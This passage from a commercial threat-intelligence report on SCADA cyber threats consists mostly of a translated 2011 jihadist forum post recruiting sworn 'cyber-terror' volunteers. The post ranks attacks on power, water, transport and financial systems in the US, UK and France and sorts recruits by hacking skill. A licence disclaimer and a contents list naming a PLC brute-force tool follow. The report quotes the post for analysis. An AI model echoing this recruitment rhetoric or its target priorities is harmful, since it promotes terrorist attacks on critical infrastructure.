Likewise, to anyone arguing that some of these volunteers may be enemy agents, I say: certainly,
this is quite expected. But do not worry, since they will be eventually uncovered and suffer
unexpected blows. This may be another advantage of this project and the new terrorist base.
30
1. The new terrorist bases tasks and priorities:

Simply put, it is a cyber-terror base, for staunching electronic terror attacks on major infidel powers,
specifically the U.S., the U.K. and France, no others. This base is not to attack, for instance, the sites
of Shia, Christians, apostates, slanderers, liars sites and forums, or anything else. I repeat: it will
only target the U.S., U.K. and France.
These are the targets of the future attacks, in order of priority:
SCADA systems, in order to destroy power, water and gas supply lines, airports, railway
stations, underground train stations, as well as central command and control systems in
these three infidel countries, in the aforementioned order.
Control systems of general financial sites, such as central saving organizations, stock
markets, and major banks.
Sites and databases of major corporations controlling the infidel countries economy.
Public sites affecting the citizens daily routine, in order to maximize the terror effects on the
population.
2. The general requirements of the male and female volunteer terrorists:
Wholehearted devotion to Allah, reliance on Him, and absolute conviction that ones actions
are a fight for Allahs Cause. One must never have the slightest doubt of the Islamic
legitimacy of it, and believe this is ones personal duty, if he is capable of it.
Keeping it secret, without ever mentioning it, not even to ones closest relatives, such as
spouse, household, children, or parents. One's should never boasting of his capability,
despite any provocations or accusations, or even if this matter is discussed in ones
presence.
Making time for practicing this project, and not being diverted by anything else. In case it
interferes with other occupations, electronic Jihad should have priority, and one should vow
this to God.
Keeping ones promise and pledge, without any slackening, under any excuse whatsoever.
Whoever suspects that certain matters may prevent him from doing so, he should not
volunteer, since he have thousands of other ways to support Jihad and Jihadists, and Allah
will reward him.
Once a target and a tactic is selected, one may never withdraw or oppose it, or express other
views, just get to work resolutely and forcefully, immediately carrying out any assignment,
following all detains and manner of operation, at all cost. Since he is in the battlefield, any
retreat or slackening is just like turning his back in a day of attack.
Finally, one must have a totally unlimited and unrestricted access to a computer with an
Internet connection.
31
3. The categories and fields of capabilities required of the terrorists:

Everyone accepting the general requirements, and wants to volunteer, should choose at least one of
the following categories which totally fit ones capabilities, without the slightest overestimation of
ones capabilities. In case of any doubt, let one choose the lesser capability. Please notice that any
higher-level category does not necessarily contain all the lower-level categories.
A proper understanding of how to hack SCADA systems.

A proper understanding of SCADA systems, without knowledge of hacking methods.
Acquaintance with writing hacking programs and scripts using lower-level languages such as
Machine l a n g u a g e or Assemply l a n g u a g e [misspelling is in the original-TG]
Absolute mastering of programming in C, C+ and C++ languages.
A highly professional acquaintance with high-level Object Oriented programming languages.
Expertise in networks, communication protocols, and various kinds of routers and firewalls,
especially CISCO.
Expertise in Linux or Unix operating systems, or both systems, and capability of easily
operating as a system manager for a server operated by these systems.
Expertise in Windows operating system and can easily serve as a system manager for a one
of the servers operated by these systems.
Expertise in information-security systems.
Proper acquaintance with testing programs and operating systems, and capability of
detecting their security vulnerabilities.
A proper understanding of the meaning of hacking and how to use the tools and software
for detecting the vulnerabilities of sites such as using the available tools for hacking, but with
no capability of making such tools.
A proper understanding of the meaning of hacking and how it is done, but lack of knowledge
on ways to obtain available tools, software or scripts to check a site he plans to hack. But, if
the necessary tools are obtained, he has the capability of hacking, unaided, a website with
any vulnerability.
A proper understanding of the meaning of hacking and how it is done, but lack of knowledge
on how to use the necessary tools without an explanation from another person.
A proper acquaintance with hackers Websites, capability of entering them easily, searching
for required scripts, tools, or software, and provide them to ones fellows, if asked for it.
A proper understanding of the communication protocols TCP/IP on the internet, including
the seven layers of the protocol and the way they interact, as well as subsequent services
such as DHCP and DNS. In addition, he needs to be acquaintance with the IP, but with no
experience in hacking.
Complete mastering of English or French scientific language and scientific background in
computer engineering. Capability of self-learning under the proper guidance from
publications in one of these languages, but with none of the aforementioned capabilities.
Mastering of Russian language.
Mastering of Chinese language.
32
None of the aforementioned categories, but full, fearless, undeterred readiness, to operate
on his PC a program provided by the terrorist base, letting it operate according to future
orders, following them precisely, with no fear from the consequences of the programs
operation. The programs MO shall be explained to such an operative, if he is ready to trust
it without any doubts, and operate it following the instructions precisely.
Now, those male and female terrorists who wish to volunteer should post a response in this thread,
made of two parts, even using the copy-paste option:
I swear to Allah that I fully accept the general conditions, and fully meet the general
requirements. I swear, before Allah, to comply with everything.
I fit into the following category or categories. Now copy-paste what fits your capabilities, if
you find any.
May Allah bless all our dear supporters.

I remind everybody unwilling or unable to participate to settle for praying for his fellows.
I also remind all male and female terrorists who wish to volunteer, they must follow this threads
contents precisely, in order to make it meet its objectives, by the will of Osamas and Aymans Lord.
Allah masters our intentions and guides our way,
Brother Yaman Mukhaddab,
10th of Rajab 1432 AH, 11th of June 2011
33
Disclaimer and Limitation of Liability

Copyright and License of Product
This report (the Product) is the property of Terrogence Ltd. and is protected by Israel and international copyright law and conventions.
User acknowledges that access to the Product is limited to the License terms set forth herein and any expansion must be in writing. The
granting of the License to access and use the Product is conditioned on User's agreement not to disclose, copy, disseminate, redistribute,
or publish the Product, or any portion of or excerpts thereof to any other party.
User shall have the right to use the Product solely for its own internal information purposes. Reproduction of the Product in any form or by
any means is forbidden without Terrogence's written permission.
User agrees to maintain all copyright, trademark and other notices contained in the Product. User agrees that it shall not use Terrogence's
name or any excerpts from the Product in the promotion of its products or services.
Disclaimer of Warranties
Terrogence does not make any warranties, express or implied, including, without limitation, those of merchantability and fitness for a
particular purpose, with respect to the Product. Although Terrogence takes reasonable steps to screen the Product for infection by viruses,
worms, Trojan horses or other code manifesting contaminating or destructive properties before making the Product available, Terrogence
cannot guarantee that the Product will be free of infection. Terrogence does not make any warranties, express or implied, of whatsoever
nature with respect to the Product or to the accuracy of any conclusions set out in the Product.
Accuracy of Information
The information contained in the Product has been obtained from sources believed to be reliable and are provided by Terrogence on an
"as is" basis. To the full extent permissible by applicable law, Terrogence disclaims all warranties, express or implied, of whatsoever nature
including, but not limited to any warranties as to the accuracy, completeness, quality or adequacy of any such information, any
conclusions set out in the Product and any translations in the Product. The reader assumes sole responsibility for the selection of the
Product to achieve its intended results. The opinions expressed in the Product are subject to change at any time without notice.
Limitation of Liability
To the extent permitted under applicable law, in no event will Terrogence be liable in any way for:
1. damages of any kind, including without limitation, direct, incidental punitive, special or consequential damages (including, but
not limited to, damages for lost profits, business interruption and loss of programs or information) arising out of the use of or
inability to use the Product, or any information provided in the Product, ;regardless of whether or not Terrogence has been
advised of the possibility of such damages;
2. any claim attributable to errors, omissions or other inaccuracies in the Product or interpretations thereof; and
3. actions taken or not taken by any person or entity as a result of the review by such person or entity of the Product or
information contained therein or as a result of the interpretation of the Product or information contained therein by such
person or entity.
Indemnification
User agrees to indemnify, defend and hold harmless Terrogence, its affiliates, licensors, and their respective officers, directors, employees
and agents from and against all losses, expenses, damages and costs, including reasonable .attorneys' fees, arising out of the use of the
Product by User or User's account.
Third Party Rights
The provisions regarding Disclaimer of Warranty, Limitation of Liability and Indemnification are for the benefit of Terrogence, and its
licensors, employees and agents. Each shall have the right to assert and enforce those provisions against a User.
General Provisions
Any provision in any memorandum received by Terrogence in connection with the Product which is inconsistent with, or adds to, the
provisions of this Agreement is void. Neither the parties' course of conduct or trade practice will modify the terms of this Agreement. If
any provision of this Agreement is determined by a court of competent jurisdiction to be invalid, all other terms and conditions shall
remain in full force and effect.
Governing Law
This Agreement and the resolution of any dispute arising hereunder shall all be governed and construed in accordance with the laws of the
state of Israel, without regard to its conflicts of law principles. User consents to the jurisdiction of the courts of Tel-Aviv.
34

Cyber Threats To SCADA Systems - Final

Hochgeladen von

Dokumentinformationen

Originaltitel

Copyright

Verfügbare Formate

Dieses Dokument teilen

Dokument teilen oder einbetten

Freigabeoptionen

Stufen Sie dieses Dokument als nützlich ein?

Sind diese Inhalte unangemessen?

Copyright:

Verfügbare Formate

Cyber Threats To SCADA Systems - Final

Hochgeladen von

Copyright:

Verfügbare Formate

Cyber Threats to ICS/SCADA Systems

Cyber Intelligence Report Cyber Threats to

Analysis of malicious tools and hacking methods

Discussions and trends on closed and password-protected forums

Reviewing SCADA-Related Cyber Incidents

Analysis of Malicious Tools and Hacking

Designated room for SCADA hacking on a

Brute-Force Tool for PLC Component Siemens S-7

For the full tool script, please see Appendix 1.

Screenshot of ScadaScan in action

SCADA Vulnerability Assessment Online Guide

Online guide cover

POC exploit code against ASATech Devices

Discussions and Trends on Closed and

Basic Information about Electronic & Electrical Controllers

Example for an Attack (Electro Hack)

Basic Information about Vulnerability of PLC & SCADA

Introductory explanation about SCADA protocols

Introductory explanation regarding a SCADA exploit

An article about the Havex virus

Screenshot from the Russian report about the Havex Trojan

A discussion from a professional SCADA forum about protecting a work

An announcement on the official AnonGhost Twitter account

A post from a Facebook page about teaching SCADA hacking

Tweet by a Kuwaiti IS expert on

Screenshot of a PLC review on the Arabic-Military forum

A list of IPs posted on Pastebin

Screenshots of the SCADA control panels taken by the hacker as proof

The hackers proof of concept for his exploitation

SCADA-Related Cyber Incidents

Forum post detailing related scripts

What this Means

The Syrian Electronic Army Hacks into Israeli SCADA Systems

Screenshot from the PDF released by the attackers

SEA denial on their Twitter account

The Syrian Electronic Army (SEA)

SEA's Twitter account (left); "Volunteering in the SEA" (right)

Iranian Hacker Group Implicates itself in Physical Attack on

Operation Roohollah Parastoo claims to have hacked into IHS Inc.

Jihadist Cyber Terror Group to Target SCADA Systems

Appendix 1 Brute-Force Tool Full Script

if pckt_len+14 == 92 and hexlify(r[pckt_indx].load)[14:24] ==

Appendix 2 Technical Indicators for the

Appendix 3: Full Translation of Yaman

Absolutely consent to the general requirements.

1. The new terrorist bases tasks and priorities:

2. The general requirements of the male and female volunteer terrorists:

3. The categories and fields of capabilities required of the terrorists:

A proper understanding of how to hack SCADA systems.

May Allah bless all our dear supporters.

Disclaimer and Limitation of Liability

Das könnte Ihnen auch gefallen